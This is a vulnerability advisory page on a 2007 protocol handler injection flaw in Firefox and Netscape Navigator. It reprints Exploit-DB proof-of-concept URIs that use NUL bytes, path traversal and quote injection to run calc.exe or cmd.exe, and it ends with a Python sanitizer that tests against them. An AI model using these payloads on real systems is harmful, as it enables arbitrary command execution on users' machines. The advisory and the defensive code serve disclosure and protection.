Vendor: Firefox and Navigator
By: SecurityFocus
CVSS: 7.5 (HIGH)
Protocol Handler Injection
CWE: 94
Product Name: Firefox and Navigator
Affected Version From: Mozilla Firefox 2.0.0.5, 3.0a6 and Netscape Navigator 9
Affected Version To: Mozilla Firefox 2.0.0.5, 3.0a6 and Netscape Navigator 9
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2007

Multiple Browsers Protocol Handler Injection Vulnerability

Multiple browsers are prone to vulnerabilities that let attackers inject commands through various protocol handlers. Exploiting these issues allows remote attackers to pass and execute arbitrary commands and arguments through processes such as 'cmd.exe' by employing various URI handlers. An attacker can exploit these issues to carry out various attacks by executing arbitrary commands on a vulnerable computer.

Mitigation:

Ensure that all user input is validated and filtered before being passed to the protocol handler. Additionally, ensure that the application is running with the least privileges necessary to perform its function.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/25053/info

Exploiting these issues would permit remote attackers to influence command options that can be called through protocol handlers and to execute commands with the privileges of a user running the application. Successful attacks may result in a variety of consequences, including remote unauthorized access.

Mozilla Firefox 2.0.0.5, 3.0a6 and Netscape Navigator 9 are reported vulnerable to these issues. Other versions of these browsers and other vendors' browsers may also be affected. 

mailto:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat

nntp:windows/system32/calc.exe%20"%20-%20"%20blah.bat

news:windows/system32/calc.exe%20"%20-%20"%20blah.bat

snews:windows/system32/calc.exe%20"%20-%20"%20blah.bat

telnet:windows/system32/calc.exe%20"%20-%20"%20blah.bat

telnet:// rundll32.exe url.dll,TelnetProtocolHandler %l

news:// "%ProgramFiles%\Outlook Express\msimn.exe" /newsurl:%1

nntp:// "%ProgramFiles%\Outlook Express\msimn.exe" /newsurl:%1

snews:// "%ProgramFiles%\Outlook Express\msimn.exe" /newsurl:%1

mailto:// C:\lotus\notes\notes.exe /defini %1
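
One way to apply the mitigation above before a URI is substituted into handler command lines like those listed here. This is an added example, not code from the advisory or from any browser. It assumes the caller hands the URI to the handler still percent-encoded; `prepare_for_handler` and the patterns are hypothetical names chosen for illustration.

```python
import re

# Schemes this page lists as handed to external Windows handlers.
EXTERNAL_SCHEMES = {"mailto", "nntp", "news", "snews", "telnet"}
SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.-]*):")
# Raw characters that change how a "%1" / "%l" command template is parsed.
UNSAFE_RAW = re.compile(r'[\x00-\x20"<>\\^`{|}\x7f]')
# Encoded NUL, or dot-dot traversal written raw or percent-encoded.
REJECT = re.compile(r"%00|(?:\.|%2e){2}(?:/|\\|%2f|%5c)", re.IGNORECASE)


def prepare_for_handler(uri):
    """Return a URI safe to substitute into a handler command line, or None.

    None means: do not launch an external handler for this URI.
    """
    m = SCHEME_RE.match(uri)
    if not m or m.group(1).lower() not in EXTERNAL_SCHEMES:
        return None  # not one of the external schemes covered by this check
    if REJECT.search(uri):
        return None  # NUL bytes and traversal have no legitimate use here
    # Percent-encode rather than drop, so legitimate data survives intact.
    return UNSAFE_RAW.sub(lambda c: "%%%02X" % ord(c.group()), uri)


# First two samples are taken from this page; the rest are constructed.
SAMPLES = [
    'nntp:windows/system32/calc.exe%20"%20-%20"%20blah.bat',
    'mailto:%00%00../../../../../../windows/system32/cmd".exe',
    "mailto:user@example.org?subject=Hello%20world",
    'telnet:host.example.org "extra',
    "http://example.org/",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(repr(s), "->", repr(prepare_for_handler(s)))
```

A `None` result should block the hand-off entirely; an encoded result is only safe if the receiving application does not unescape the URI and re-parse it as a command line.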